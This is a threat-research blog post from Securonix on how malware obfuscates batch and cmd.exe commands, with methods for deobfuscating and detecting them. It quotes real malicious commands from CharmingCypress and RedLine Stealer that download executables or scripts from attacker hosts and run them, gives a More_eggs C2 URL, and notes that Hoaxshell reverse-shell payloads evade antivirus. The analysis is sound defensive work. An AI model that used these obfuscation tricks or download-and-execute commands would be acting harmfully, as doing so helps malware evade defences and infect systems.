Securonix Threat Research Knowledge Sharing Series: Batch (DOS) Obfuscation or DOSfuscation: Why It’s on the Rise, and How Attackers are Hiding in Obscurity

By Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov

tldr: In order for malware to successfully infect its target, code obfuscation passed into cmd.exe is frequently used. Let’s look at some real-world examples of what threat actors are doing, and how they can be detected.

Last year we touched on how threat actors leverage PowerShell and how code can be obfuscated to avoid detection. Recently, the Securonix Threat Research team has been monitoring a trend known as batch (DOS) fuscation or DOSfuscation where an increased number of malware samples use obfuscated code contained within batch or DOS-based scripts.

This trend was likely brought about when Microsoft made the decision to disable macro execution in Office products by default. Since then, there has been a rise in shortcut-based (.lnk file) execution coming from archived email attachments. Naturally, CMD obfuscation is the natural path as any passed in command line into a shortcut file will likely be primarily executed using cmd.exe as the initial process.

But why cmd.exe when there are much more robust code execution platforms out there? One answer could be due to the fact that Windows Antimalware Scan Interface (AMSI)  supports several scripting engines natively, including PowerShell, JavaScript, and VBScript. However, AMSI doesn’t directly support batch scripts (.bat files) or commands executed using cmd.exe. This is partly because batch files are a much older technology and are generally more limited in functionality compared to PowerShell scripts, which can execute a wide range of complex operations, including direct interactions with the Windows API, making this method an easy win for attackers looking to reduce the likelihood of an antivirus (AV) hit during initial code execution.

Similarly to obfuscation methods in PowerShell, or any other scripting language for that matter, the goal of obfuscating command is simply to avoid detection; whether that detection method is antivirus software, or getting around the human-based detection such as a SOC analyst, the goal is the same.

Malware families that use obfuscated batch scripts

Looking back over the past few years, some of the more recent malware campaigns or attack frameworks that leverage obfuscated DOS/batch scripts include the following:

  • Engine BatCloak
  • More Eggs
  • Underground Team ransomware
  • Villain/Hoaxshell
  • Trickbot
  • OCX#HARVESTER
  • STEEP#MAVERICK
  • SeroXen
  • BatCloak
  • AsyncRAT
  • YourCyanide
  • Batloader
  • CharmingCypress
  • Redline Stealer

Obfuscation methods

In general, code obfuscation is the deliberate process of transforming the original source code into a more complex and convoluted version, which is challenging to interpret and analyze by security analysts or threat researchers. This technique is employed with the intent of either evading AV detection systems or hindering the efforts of reverse engineering the code by cybersecurity professionals. However, it is crucial for the obfuscated code to maintain its intended functionality and execute flawlessly, despite how it looks; otherwise, the purpose of obfuscation would be rendered ineffective.

Both obfuscating and deobfuscating code can be challenging, however there are many online tools that can assist in this effort such as Invoke-Dosfucation from Daniel Bohannon. While there many techniques threat actors are using to hide code in command line or batch files, we’ll cover some of the more common methods that our team has seen recently in the wild.

Incorporating malware

Threat actors and malware authors will generally execute obfuscated batch scripts upon the initial execution phase of the attack chain. Today, this often presents itself from within a .lnk or shortcut file in Windows.

In one common scenario, a phishing email is delivered to the victim with a malicious zip file attachment. The user downloads and opens the zip, and inside is a shortcut file which presents itself as some interesting lure. The user double clicks the shortcut which might be disguised as a PDF or some other form of media file, however the shortcut in fact links to cmd.exe with appended obfuscated code. Such is the case with so many examples, and it’s relatively easy for the attacker to implement.

In the example of the CharmingCypress malware family from earlier this year, the cmd.exe linked shortcut would contain obfuscated batch code that looks like the following:

/c set c=cu7rl –s7sl-no-rev7oke -s -d “id=VzXdED&Prog=2_Mal_vbs.txt&WH=The-global-.pdf” -X PO7ST hxxps://east-healthy-dress.glitch[.]me/Down -o %temp%\down.v7bs & call %c:7=% & set b=sta7rt “” “%temp%\down.v7bs” & call %b:7=%

This is only one example, and in the next section we’ll take a look at other real world examples and discover how we can deobfuscate and even detect obfuscation artifacts of real malware samples.

String splitting

This method is by far the simplest and is less of a counter-forensics or anti-analysis technique and more of an antivirus bypass technique. The idea behind splitting up known or bad strings is nothing new. We regular see this in malicious PowerShell scripts, especially during the STEEP#MAVERICK campaign last year.

There are several ways to accomplish this technique, but the idea is to stuff random characters in between CMD commands, parameters, or variables that would essentially split the string into several parts without hindering its execution. The attacker’s goal in this scenario is to bypass antivirus or detections through logging signature detection. If the antivirus has a signature matching “whoami” for example, it is possible that “wh^oam^i” could be ignored and execution will continue.

Figure 1: Obfuscated “ipconfig /all and whoami” command showing splitting strings using the caret symbol (highlighted)

Demonstrated in the figure above, a commonly used method is to stuff escape characters “^” or caret symbols inside obfuscated commands or scripts. These are ignored by cmd.exe provided they aren’t making the proceeding character literal to where it would normally break execution.

Additionally, quotation marks can be used to break up strings. This is provided that an even number of these characters are used. This obfuscation technique was used in the aforementioned STEEP#MAVERICK campaign reported last year.

Figure 2: Breaking up strings using quotation marks

Split strings: deobfuscation

Effort – minimal: If these characters are ignored by the command interpreter, then so can we also ignore them. The script can be opened or pasted into a text editor with find/replace capabilities and be simply removed.

Variable substitution

For this example, let’s take a look at some of the obfuscation techniques used by RedLine Stealer. This particular stealer is very active today and has been making waves through search engine malvertising campaigns. The batch obfuscation method used here is a bit more advanced and requires some basic batch scripting knowledge. In batch, a new environmental variable can be created using the “set” command. For example:

set newVar=hello world!

The new “newVar” variable can then be referenced in the script by wrapping it in percent symbols. For example it can be printed using:

echo %newVar%

As you guessed, running this command will print “Hello World!” as standard out on the console. Attackers can abuse this by creating random, or oddly named variables and stuffing them into random locations in the batch script.

Additionally, delayed expansion or delayed environmental variables can be used when “set” is used for variables within a loop. This then uses the “!variable!” syntax versus the traditional “%variable%” syntax. Within a loop, this method would only be used when delayed expansion is specifically enabled via “enable delayed expansion” flag “/v” or “/v:on” parameter is passed into cmd.exe process calling the batch script.

This method was used during the OCX#HARVESTER campaign we highlighted earlier this year. In this example, environment variables were set and placed throughout the initial script contained in a .lnk file.

Figure 3: Obfuscated .lnk payload from MORE_EGGS malware.

At this point we can forget about human readability, but at a high level, the variable substitution can be seen in action. For instance, take the following string from the figure above. While it’s clear that this is our C2 connection URL, let’s decode the rest for educational purposes.

%P203%%P436%%P436%p%P113%%P872%%P872%95.179.201.171/robots.%P405%p

Examining the script gives us the following values and their definitions:

%P203% = h

%P436% = t

%P436% = t

       + p

%P113% = :

%P872% = /

%P872% = /

%P405% = ph

Now, putting it all together, we’re presented with the completed string:

http:// 95.179.201[.]171/robots.php

Substitution: deobfuscation

Effort – medium/hard: In this particular case, for a script this size it is not too difficult to simply go through the script and perform a find/replace on values to uncover the original unobfuscated version. However, for much larger scripts where you can end up with hundreds or even thousands of variables, we recommend shifting gears by redirecting the execution flow.

At some point a script has to contain a command to execute the code. This can be “start x” or in this case where the windows binary wmic.exe is called “wmic process call create x”. Additionally, a path to an exe file is sometimes used. If you can identify this portion of the script, you can redirect the script to “print” or “echo” its contents versus executing them.

Variable index extraction

Now we’re getting even deeper into the weeds where this level of obfuscation can take quite a bit of time to analyze and determine the script’s original intent. Variable index extraction involves creating a new variable and setting it to a long string. We’ll then individually reference individual characters by using numerical index values to build out our malicious command. It works similar to referencing an array value from a variable.

Let’s take a look at a RedLine Stealer payload our team analyzed earlier this year. The script began with an interesting batch file named 3.bat. The batch file was first obfuscated using (spoiler alert) encoding manipulation. We’ll dive into that type of obfuscation in the next section.

Once decoded, we were presented with the following script. While it looks like a huge mess, let’s break it down into individual bites and see what it is we’re looking at.

Figure 4: Obfuscated RedLine Stealer payload using variable substitution and array character extraction – 3.bat

Part of what makes a script like this extremely confusing is the use of oddly named variables. Diving into the RedLine Stealer payload, it makes more sense as we break it into chunks and peel back the layers:

  1. This line simply clears the screen and uses the “set” command to create a new environment variable named “û§ C” and sets it to “ne4TaupFHgPWvM3jwImrL5qUZkBlRd17Sc z@KDGfCAYQ2iohVbs09Jt6XO8yxEN”. A unicode character for a non-break space (U+0xa0) is present in the variable name. So not only are there special characters, but invisible ones at that!
  2. This chunk of code is basically pulling individual characters from the “û§ C” variable and building a new command. Individual characters are extracted using the syntax “%variable:~start_index_num,end_index_num%”. The index numbers are the character positions beginning with 0 for the first character.So in this example,  the first two references are:
    Variable + Referenced Index Value
    %û§ C:~36,1% @
    %û§ C:~51,1% s
    %û§ C:~1,1% e
    %û§ C:~55,1% t

    Continuing this pattern will result in the obfuscated command in its entirety:@set “.JÃ.d=T2c4uSRDUJvLxzdM6rBwH1XKbYjmqA0GfV sOpgk9ieNCo3aE%ÃÃã´Ã¢%5yIhtP7FWln8ZQ@”

  3. The third block essentially repeats step two but with the newly created variable “.JÃ.d” and its associated variable value “T2c4uSRDUJvLxzdM6rBwH1XKbYjmqA0GfV sOpgk9ieNCo3aE%ÃÃã´Ã¢%5yIhtP7FWln8ZQ@”. Once decoded, we’re presented with the final deobfuscated code which will then execute on the host:cd %temp%  curl -o bud.exe hxxps://convertmast[.]com/bldd & start bbd.exe & curl -o bud2.exe hxxps://convertmast[.]com/bldd2 & start bud2.exe

Variable index extraction: deobfuscation

Effort – hard: Deobfuscating this particular method and peeling back the layers can be challenging. Even simply exercising some good old dynamic analysis by running the code might not get you the original unobfuscated script into process logs such as those from Sysmon.

We’ve found the best way to deobfuscate code using variable index extraction is to set the original variables manually in the terminal, and then use the “echo” command to print the values.

Figure 5: Deobfuscating RedLine Stealer payload using the “echo” command

In the figure above, we simply added an echo command before the payload which prevents it from executing. Instead it prints the obfuscated values. The same process can be repeated for the next block of code from the original script. At this point, it’s a matter of repeating the process for each obfuscated string.

Encoding manipulation

This particular type of obfuscation is rather interesting. It completely removes the human readability element as well as detection capabilities. While on the outside, this method of obfuscation looks like a nightmare to deal with, it’s actually quite simple to implement, as well as to deobfuscate.

Figure 6: RedLine Stealer character encoded payload

The figure above features an actual image from an encoded RedLine Stealer payload analyzed by our team. This type of obfuscation is still quite common and was recently seen used by the Underground team ransomware. It works by changing the encoding of the original file into something that would still execute, but present itself differently. In this case, the attackers decoded the file into UTF-16 LE.

After it’s decoded, and opened with a text editor, it looks like pure nonsense to us humans.

Encoding manipulation: deobfuscation

Effort – easy: There are a number of online tools that can assist in deobfuscating this type of obfuscation, however probably the simplest method is to re-encode the text back into UTF-8. This can be done by re-encoding the garbage text into UTF-16LE which can be done using this Cyberchef recipe or by using one of several Python or Batch scripts to assist in the process.

Figure 7: RedLine Stealer character encoded payload deobfuscated using CyberChef

Use case – Villain / Hoaxshell

Last year, we took a deep dive into the Villain and Hoaxshell frameworks by @t3l3machus. In a recent change the framework now supports more than just PowerShell, including CMD-based connection strings as well. These changes recently surfaced on the popular reverse shell generation website, revshells.

Not surprisingly, due to the lack of AMSI protection, this method is quite effective at bypassing antivirus detections, even when using the out-of-the-box payloads generated using revshells. By manually adding another layer of obfuscation as we discussed previously, the likelihood of bypassing sophisticated EDR solutions only increases.

Figure 8: Hoaxshell bypassing Windows Defender

Summary – detecting the undetectable

While there are additional obfuscation methods a threat actor might use to hide their code, we went over some of the more recent heavy-hitters when it comes to popularity. While detecting code crafted specifically to bypass detections can be challenging, it’s not impossible. There are some reliable real-world detections that can give us some easy wins.

We highly recommend enabling process-level logging such as EVID 4688 with command line, and utilizing Sysinternals: Sysmon, for a layered defense-in-depth approach. Deployment on endpoints is critical, as endpoints are typically where the initial compromise starts in the attack kill chain.

Below we’ve provided some relevant detections and spotter queries that Securonix customers can use to assist in detections or investigations where process and command-line logging are enabled.

Relevant provisional Securonix detections

  • EDR-ALL-1102-RU
  • EDR-ALL-1100-ER
  • EDR-ALL-1261-RU,WEL-ALL-1217-RU
  • EDR-ALL-1265-RU,WEL-ALL-1221-RU
  • EDR-ALL-1264-RU,WEL-ALL-1220-RU
  • EDR-ALL-1263-RU , WEL-ALL-1219-RU

Relevant hunting/spotter queries

  • index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (resourcecustomfield1 CONTAINS “s^et” OR resourcecustomfield1 CONTAINS “se^t” OR resourcecustomfield1 CONTAINS “^set” OR resourcecustomfield1 CONTAINS “set^” OR resourcecustomfield1 CONTAINS “s^e^t”)
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND destinationprocessname ENDS WITH “cmd.exe” AND resourcecustomfield1 CONTAINS “for /L %” AND resourcecustomfield1 CONTAINS “!!” AND resourcecustomfield1 CONTAINS “/v:on”
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND destinationprocessname ENDS WITH “cmd.exe” AND resourcecustomfield1 CONTAINS “for ” AND resourcecustomfield1 CONTAINS “in ” AND resourcecustomfield1 CONTAINS “do set” AND resourcecustomfield1 CONTAINS “/v:on” AND resourcecustomfield1 CONTAINS “!!”
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND destinationprocessname ENDS WITH “cmd.exe” AND resourcecustomfield1 CONTAINS “/v:on” AND resourcecustomfield1 CONTAINS “!&&set ” AND resourcecustomfield1 CONTAINS “set “
  • index = activity AND rg_functionality = “Endpoint Management Systems” AND deviceaction = “Process Create” AND destinationprocessname ENDS WITH “cmd.exe” AND resourcecustomfield1 CONTAINS “/v:on” AND resourcecustomfield1 CONTAINS “!&&set ” AND resourcecustomfield1 CONTAINS “set “

MITRE ATT&CK matrix

Tactics Techniques
Defense Evasion T1027: Obfuscated Files or Information
T1027.010: Obfuscated Files or Information: Command Obfuscation
T1140: Deobfuscate/Decode Files or Information
Execution T1059: Command and Scripting Interpreter
T1059.003: Command and Scripting Interpreter: Windows Command Shell

References

  1. Securonix Threat Research Knowledge Sharing: Hiding the PowerShell Execution Flow
    https://www.securonix.com/blog/hiding-the-powershell-execution-flow/
  2. Detecting STEEP#MAVERICK: New Covert Attack Campaign Targeting Military Contractors
    https://www.securonix.com/blog/detecting-steepmaverick-new-covert-attack-campaign-targeting-military-contractors/
  3. CharmingCypress: Innovating Persistence
  4. https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/
  5. New OCX#HARVESTER Attack Campaign Leverages a Modernized More_eggs Suite to Target Victims
    https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/
  6. EnableDelayedExpansion
    https://ss64.com/nt/delayedexpansion.html
  7. TrickBot malware uses obfuscated Windows batch script to evade detection
    https://www.bleepingcomputer.com/news/security/trickbot-malware-uses-obfuscated-windows-batch-script-to-evade-detection/
  8. Malvertising through search engines
    https://securelist.com/malvertising-through-search-engines/108996/
  9. Command line process auditing
    https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing
  10. Hoaxshell/Villain Powershell Backdoor Generator Payloads in the Wild, and How to Detect in Your Environment
    https://www.securonix.com/blog/hoaxshell-villain-powershell-backdoor-generator-payloads-in-the-wild-and-how-to-detect-in-your-environment/
  11. Underground Team Ransomware Demands Nearly $3 Million
    https://blog.cyble.com/2023/07/05/underground-team-ransomware-demands-nearly-3-million/
  12. Analyzing the FUD Malware Obfuscation Engine BatCloak
    https://www.trendmicro.com/en_us/research/23/f/analyzing-the-fud-malware-obfuscation-engine-batcloak.html